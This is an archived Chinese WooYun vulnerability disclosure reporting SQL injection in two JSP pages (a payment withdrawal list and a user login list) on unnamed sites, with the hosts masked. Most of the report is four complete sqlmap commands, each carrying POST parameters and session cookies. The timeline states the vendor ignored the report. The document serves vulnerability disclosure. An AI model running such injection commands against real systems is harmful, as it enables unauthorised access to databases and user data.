乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开
神器为: http://zone.wooyun.org/content/21289
https://**.**.**.**/bugs/wooyun-2015-0152055中影响的这些站登陆之后,然后就可以注入,上次提交的是17个手机端的注入,可以影响到我的上一个漏洞,因为还没审核,我就先不贴出地址这次来两个电脑端的money/payDraw_list.jsp
sqlmap.py -u "http://**.**.**.**/money/payDraw_list.jsp" --data="sdate=2015-11-11&edate=2015-11-17&search=%E6%8F%90+%E4%BA%A4&d=3" --cookie="JSESSIONID=gKJvt0fsxird; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP0IjN3UCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZx0DMyInJzVXZfJmbtFTZm3Ynl7bhkTJumoXafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFDMmImcs9VZp9DZ10nJzVXZfJWa9QHb5hgJ==" --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"
sqlmap.py -u "http://**.**.**.**/money/payDraw_list.jsp" --data="sdate=2015-11-11&edate=2015-11-17&search=%E6%8F%90+%E4%BA%A4&d=3" --cookie="JSESSIONID=enm1VHt_3RGd; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP5IjM3UCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZ40zN2cCN1Z2cyV2Xh5Wb9U45L6b5pKmJzl2Xyd3bwVTPmEXafNGZzlDcx0mJiR2Xpxmb9s2chFzcxAnJvJGbfVWa9QSN1Z2cyV2XklXPhdmb5dWYm4" --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"
system/usr_login_list.jsp
sqlmap.py -u "http://**.**.**.**/system/usr_login_list.jsp" --data="action=ajaxData&lx=&pageNo=1&sdate=&eate=&user_id=&cust_id=" --cookie="JSESSIONID=gKJvt0fsxird; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP0IjN3UCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZx0DMyInJzVXZfJmbtFTZm3Ynl7bhkTJumoXafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFDMmImcs9VZp9DZ10nJzVXZfJWa9QHb5hgJ==" --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"
sqlmap.py -u "http://**.**.**.**/system/usr_login_list.jsp" --data="action=ajaxData&lx=&pageNo=1&sdate=&eate=&user_id=&cust_id=" --cookie="JSESSIONID=enm1VHt_3RGd; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP5IjM3UCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZ40zN2cCN1Z2cyV2Xh5Wb9U45L6b5pKmJzl2Xyd3bwVTPmEXafNGZzlDcx0mJiR2Xpxmb9s2chFzcxAnJvJGbfVWa9QSN1Z2cyV2XklXPhdmb5dWYm4" --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"
过滤
未能联系到厂商或者厂商积极拒绝